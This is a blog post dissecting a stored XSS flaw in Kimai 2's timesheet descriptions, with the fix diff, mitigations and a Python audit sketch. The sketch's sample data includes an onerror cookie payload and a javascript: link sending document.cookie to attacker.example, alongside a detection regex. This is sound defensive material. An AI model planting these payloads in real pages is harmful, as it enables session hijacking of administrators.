DEV Community

CVE Reports

Posted on • Originally published at cvereports.com

CVE-2019-25317: Time is Money, and XSS: Dissecting CVE-2019-25317 in Kimai 2

Vulnerability ID: CVE-2019-25317
CVSS Score: 6.4
Published: 2026-02-11

Kimai 2 is a popular open-source time-tracking application for freelancers and companies alike. Versions before 1.1, however, had a skeleton hiding in the timesheets: a classic stored cross-site scripting (XSS) flaw that let any authenticated user who could log hours turn a timesheet entry into a weapon against the people reviewing it. The timesheet description field accepts Markdown, and the renderer passed raw HTML in that Markdown through unmodified, so an attacker could store a payload containing JavaScript that executed the moment an administrator opened the entry.

TL;DR

Kimai 2 before 1.1 contains a stored XSS vulnerability in the timesheet description field. Markdown in the description was rendered with raw HTML enabled and without output escaping, so any authenticated user could store arbitrary HTML and JavaScript. When an administrator views the timesheet, the payload runs in the administrator's browser session, which can lead to session hijacking.


⚠️ Exploit Status: PoC

Technical Details

  • CWE ID: CWE-79
  • CVSS v3.1: 6.4 (Medium)
  • Attack Vector: Network (Stored)
  • Privileges Required: Low (Authenticated User)
  • Impact: Confidentiality & Integrity (Session Hijacking)
  • Exploit Status: PoC Available (EDB-47286)

Affected Systems

  • Kimai 2 <= 1.0.1 (fixed in 1.1)

Code Analysis

Commit: a0e8aa3

Fix XSS in timesheet description by disabling HTML in markdown and escaping output

- return $this->markdown->toHtml($content, true);
+ return $this->markdown->toHtml($content, false);
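Review bot: the only change is flipping the second argument of `toHtml()` from `true` to `false`, and nothing in the hunk says what that boolean controls, so a reviewer cannot confirm from the diff alone that `false` means "raw HTML off" rather than "safe mode off"; the commit message also promises "escaping output", but no escaping appears in these two lines. Suggest replacing the bare boolean with a self-describing option or a named constant at the call site, pointing in the commit message to where the output escaping lives, and adding a regression test that renders a description containing `<script>` and asserts the tag comes back escaped.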

Exploit Details

  • Exploit-DB: Persistent Cross-Site Scripting PoC via Timesheet Description

Mitigation Strategies

  • Input sanitization: render the description's Markdown with raw HTML disabled, so tags typed by the author are treated as text rather than markup.
  • Output encoding: HTML-escape the rendered description in the template, so payloads already stored before the fix are neutralised on display.
  • Content Security Policy (CSP): serve a policy that disallows inline scripts, so an injected <script> tag or event handler is blocked by the browser even if it reaches the page.

Remediation Steps:

  1. Upgrade Kimai 2 to 1.1 or later.
  2. Audit the timesheet description column for payloads stored before the upgrade: HTML tags, inline event handlers (onerror=, onload=, ...) and javascript: URLs in Markdown links.
  3. Implement a Content Security Policy (CSP) that restricts script sources and forbids inline scripts.
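As an added example (not Kimai's code and not from the original report), the Python sketch below shows the two things the analysis above points at: why a Markdown renderer that passes raw HTML through is a stored-XSS sink and what a safe mode has to do instead, and the post-upgrade audit of stored descriptions from step 2. The Markdown renderer is a deliberately tiny subset written for illustration (Kimai itself uses Parsedown), the sample rows are constructed, and the table name `kimai2_timesheet` in the SQL string is an assumption about Kimai's default schema.

```python
"""Added example for this write-up (not Kimai's own code).

1. render_markdown(): the vulnerable behaviour (raw HTML passed through)
   next to a safe mode that escapes the source text *before* any Markdown
   transformation and refuses unsafe link schemes.
2. audit_descriptions(): scan stored descriptions for likely payloads.

The Markdown subset here (bold, inline code, links) is for illustration only.
"""
import html
import re

# Link schemes a safe-mode renderer is willing to emit in href= attributes.
SAFE_SCHEMES = ("http://", "https://", "mailto:")


def render_markdown(text: str, allow_raw_html: bool) -> str:
    """Render a Markdown subset to HTML.

    allow_raw_html=True mirrors the vulnerable behaviour: whatever tags the
    author typed are copied straight into the page.
    allow_raw_html=False is the safe mode: '<', '>', '&' and quotes in the
    source are HTML-escaped first, so the only tags in the output are the
    ones this function itself emits, and link targets are limited to
    SAFE_SCHEMES so a javascript: URL cannot sneak in through [text](url).
    """
    if not allow_raw_html:
        text = html.escape(text, quote=True)

    text = re.sub(r"`([^`]+)`", r"<code>\1</code>", text)            # `code`
    text = re.sub(r"\*\*([^*]+)\*\*", r"<strong>\1</strong>", text)  # **bold**

    def link(m: re.Match) -> str:
        label, url = m.group(1), m.group(2)
        if not allow_raw_html and not url.lower().startswith(SAFE_SCHEMES):
            return label  # drop the dangerous target, keep the visible text
        return f'<a href="{url}">{label}</a>'

    return re.sub(r"\[([^\]]+)\]\(([^)\s]+)\)", link, text)  # [label](url)


# Patterns that flag a description as a likely XSS payload: tags commonly used
# to carry scripts, inline event handlers, and javascript: URLs.
SUSPICIOUS = re.compile(
    r"<\s*(?:script|iframe|img|svg|object|embed|a)\b"
    r"|\bon[a-z]+\s*="
    r"|javascript\s*:",
    re.IGNORECASE,
)

# Rough SQL equivalent for a first pass directly against the database; hits
# still need manual review. Table/column names are an ASSUMPTION about
# Kimai's default schema, not taken from the advisory.
AUDIT_SQL = """
SELECT id, description
  FROM kimai2_timesheet
 WHERE description LIKE '%<%'
    OR description LIKE '%javascript:%';
"""


def audit_descriptions(rows):
    """Return the (id, description) rows whose description matches SUSPICIOUS.

    rows: iterable of (timesheet_id, description); description may be None.
    """
    return [(rid, desc) for rid, desc in rows if desc and SUSPICIOUS.search(desc)]


# Constructed sample rows (not real Kimai data): (timesheet id, description).
SAMPLE_ROWS = [
    (101, "Sprint planning, **backend** tickets"),
    (102, '<img src=x onerror="alert(document.cookie)">'),
    (103, "Client call; see [notes](https://wiki.example.com/notes)"),
    (104, "[timesheet](javascript:location='https://attacker.example/?c='+document.cookie)"),
    (105, None),
]


if __name__ == "__main__":
    for rid, desc in audit_descriptions(SAMPLE_ROWS):
        print(f"timesheet {rid}: {desc!r}")
        print("  vulnerable render:", render_markdown(desc, allow_raw_html=True))
        print("  safe-mode render: ", render_markdown(desc, allow_raw_html=False))
```

The safe-mode branch escapes before any Markdown transformation runs, so the only tags in the output are the ones the renderer emits itself. The link-scheme check is there because `[text](javascript:...)` is valid Markdown that survives HTML escaping untouched, which is why "disable raw HTML" on its own does not close every script path; the audit regex flags such links for the same reason.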

Read the full report for CVE-2019-25317 on our website for more details including interactive diagrams and full exploit analysis.
